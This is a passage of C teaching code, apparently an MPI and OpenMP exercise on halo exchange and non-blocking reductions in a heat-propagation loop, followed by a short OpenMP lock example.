printf("%g", local_data_set[i][j]);
}
printf(" ]\n");
}
float working_data_set[6][8];
for (int i = 0; i < 4; i = i + 1)
{
for (int j = 0; j < 8; j = j + 1)
{
/* Initialize the local part of the working data set */
working_data_set[i+1][j] = local_data_set[i][j];
}
}
/* Prepare to report whether the code is correct */
int success = 1;
/* Do the loop over heat-propagation steps */
float next_working_data_set[6][8];
float total, local_total, temporary_total;
const int total_root_rank = 0;
MPI_Request total_request = MPI_REQUEST_NULL;
const int max_step = 10;
omp_set_nested(1);
report_thread_id("Before loop", -1, rank);
for (int step = 0; step < max_step; step = step + 1)
{
#pragma omp parallel num_threads(4)
{
report_thread_id("First region", step, rank);
#pragma omp parallel num_threads(2) /* Make a nested team */
{
report_thread_id("Second region", step, rank);
MPI_Request sent_to_destination[2];
int send_up_tag = 0, send_down_tag = 1;
#pragma omp task
{
report_thread_id("isend", step, rank);
/* Prepare to send the border data */
int destination_rank = size-rank-1;
MPI_Isend(working_data_set[1], 8, MPI_FLOAT, destination_rank,
send_up_tag, comm, &sent_to_destination[0]);
MPI_Isend(working_data_set[4], 8, MPI_FLOAT, destination_rank,
send_down_tag, comm, &sent_to_destination[1]);
}
#pragma omp task
{
report_thread_id("recv", step, rank);
/* Prepare to receive the halo data */
int source_rank = size-rank-1;
MPI_Recv(working_data_set[5], 8, MPI_FLOAT, source_rank,
send_up_tag, comm, MPI_STATUS_IGNORE);
MPI_Recv(working_data_set[0], 8, MPI_FLOAT, source_rank,
send_down_tag, comm, MPI_STATUS_IGNORE);
}
#pragma omp barrier
/* Barrier to ensure receive has finished */
/* ==== CHALLENGE ====
*
* Uncomment and fix the arguments to the MPI call to make
* this code work!
*
* Pass parameters to compute_row() in a way that each
* iteration of the for loop does an equal part of the
* local_work, ie rows 1 and 4 of the working_data_set. You
* may need to consult the parameter names of compute_row().
*/
/* Do the non-local computation. OpenMP will distribute each
* iteration to a different thread. */
int non_local_work[] = {1, 4};
#pragma omp parallel for
for (int k = 0; k != 2; k = k + 1)
{
report_thread_id("non-local", step, rank);
compute_row(non_local_work[k], working_data_set, next_working_data_set);
}
/* Implied thread barrier here */
#pragma omp task
{
/* Wait for the halo-exchange sends to complete */
MPI_Wait(&sent_to_destination[0], MPI_STATUS_IGNORE);
MPI_Wait(&sent_to_destination[1], MPI_STATUS_IGNORE);
}
/* No barrier needed at end of nested parallel region */
}
#pragma omp parallel num_threads(2)
{
report_thread_id("Third region", step, rank);
/* ==== CHALLENGE ====
*
* Uncomment and fix the arguments to the MPI call to make
* this code work!
*
* Pass parameters to compute_row() in a way that each
* iteration of the for loop does an equal part of the
* local_work, ie rows 2 and 3 of the working_data_set. You
* may need to consult the parameter names of compute_row().
*/
/* Do the local computation. OpenMP will distribute each
* iteration to a different thread. */
int local_work[] = {2, 3};
#pragma omp for
for (int k = 0; k != 2; k = k + 1)
{
report_thread_id("local", step, rank);
compute_row(local_work[k], working_data_set, next_working_data_set);
}
/* Implied thread barrier here */
}
}
/* End thread-parallel region */
/* Compute the total heat via non-blocking reduction */
if (step % 5 == 4)
{
local_total = 0;
for (int i = 1; i < 5; i = i + 1)
{
for (int j = 0; j < 8; j = j + 1)
{
local_total += next_working_data_set[i][j];
}
}
fprintf(stderr, "Doing an non-blocking reduction on step %d\n", step);
MPI_Ireduce(&local_total, &temporary_total, 1, MPI_FLOAT, MPI_SUM, total_root_rank, comm, &total_request);
}
/* Wait for the most recent total heat reduction, 4 steps after it was started */
if (step % 5 == 3 && total_request != MPI_REQUEST_NULL)
{
MPI_Wait(&total_request, MPI_STATUS_IGNORE);
total = temporary_total;
if (rank == total_root_rank)
{
fprintf(stderr, "Total after waiting at step %d was %g\n", step, total);
}
}
if (rank == total_root_rank)
{
const float expected_total_value = (step < 8) ? 0 : 300000;
if (total != expected_total_value)
{
success = 0;
printf("Failed on step %d with total %g not matching expected %g\n",
step, total, expected_total_value);
}
}
/* Prepare to iterate */
for (int i = 1; i < 5; i = i + 1)
{
for (int j = 0; j < 8; j = j + 1)
{
/* copy the output back to the input array */
working_data_set[i][j] = next_working_data_set[i][j];
}
}
}
/* Now that we have left the main loop, we should wait for
* the most recent total heat reduction to complete. */
if (total_request != MPI_REQUEST_NULL)
{
MPI_Wait(&total_request, MPI_STATUS_IGNORE);
total = temporary_total;
if (rank == total_root_rank)
{
fprintf(stderr, "Total after waiting at step %d was %g\n",
max_step - 1, total);
}
}
if (rank == total_root_rank)
{
const float expected_total_value = 9.375e+08;
if (total != expected_total_value)
{
success = 0;
printf("Failed on step %d with total %g not matching expected %g\n",
max_step - 1, total, expected_total_value);
}
}
/* Report whether the code is correct */
if (rank == total_root_rank)
{
if (success)
{
printf("SUCCESS on rank %d!\n", rank);
}
else
{
printf("Improvement needed before rank %d can report success!\n", rank);
}
}
/* Clean up and exit */
MPI_Finalize();
return 0;
}
|
lock.c | #include <stdio.h>
#include <omp.h>
static omp_lock_t lock;
int main(int argc, char const *argv[])
{
/* code */
omp_init_lock(&lock);
#pragma omp parallel for
for (size_t i = 0; i < 5; i++)
{
omp_set_lock(&lock);
printf("%d+\n", omp_get_thread_num());
printf("%d-\n", omp_get_thread_num());
omp_unset_lock(&lock);
}
// always use a ref in lock operations
omp_destroy_lock(&lock);
return 0;
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.